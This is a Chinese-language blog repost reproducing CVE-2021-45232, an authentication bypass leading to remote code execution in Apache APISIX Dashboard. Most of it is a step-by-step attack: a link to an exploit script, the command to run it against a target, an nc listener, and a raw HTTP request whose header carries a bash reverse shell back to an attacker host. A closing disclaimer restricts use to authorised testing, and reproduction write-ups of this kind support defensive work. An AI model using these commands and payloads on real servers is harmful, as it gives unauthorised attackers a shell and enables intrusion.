本文转载于公众号:融云攻防实验室,原文地址:
漏洞复现 CVE-2021-45232 Apache APISIX Dashboard RCE
0x01 阅读须知
资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明
0x02 漏洞描述
在2.10.1之前的apache apisix Dashboard中,Manager API使用了两个框架,并在框架‘gin’的基础上引入了框架‘droplet’,所有的API和认证中间件都是基于框架‘droplet’开发的,但有些API直接使用框架‘gin’的接口,从而绕过了认证进而可导致远程代码执行。
![图片[1]-CVE-2021-45232 Apache APISIX Dashboard RCE-渗透云记 - 专注于网络安全与技术分享](https://b.encenc.com/wp-content/uploads/2023/02/d2b5ca33bd171821.png)
0x03 漏洞复现
漏洞影响:
apache: 2.7.0 < APISIX Dashboard< 2.10.1
1.使用漏洞利用脚本,进行攻击
1.下载脚本:
http://github.com/wuppp/apisix_dashboard_rce
2.漏洞利用:
python apisix_dashboard_rce.py http://x.x.x.x:9000/
![图片[2]-CVE-2021-45232 Apache APISIX Dashboard RCE-渗透云记 - 专注于网络安全与技术分享](https://b.encenc.com/wp-content/uploads/2023/02/d2b5ca33bd171917.png)
2.nc监听,反弹shell
1.nc监听:
nc -lvnp 7777
2.反弹shell
GET /yoDwcM HTTP/1.1
Host: x.x.x.x:9080
cmd: bash -c 'exec bash -i &>/dev/tcp/x.x.x.x/7777 <&1'
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
![图片[3]-CVE-2021-45232 Apache APISIX Dashboard RCE-渗透云记 - 专注于网络安全与技术分享](https://b.encenc.com/wp-content/uploads/2023/02/d2b5ca33bd171943.png)
© 版权声明
渗透云记的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
渗透云记拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!
本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!访问本博客请务必遵守有关互联网的相关法律、规定与规则。一旦您访问本博客,即表示您已经知晓并接受了此声明通告。详情见本站的“免责声明”如果有侵权之处请第一时间联系我们删除。敬请谅解!E-mail:admin@encenc.com
THE END




















请登录后查看评论内容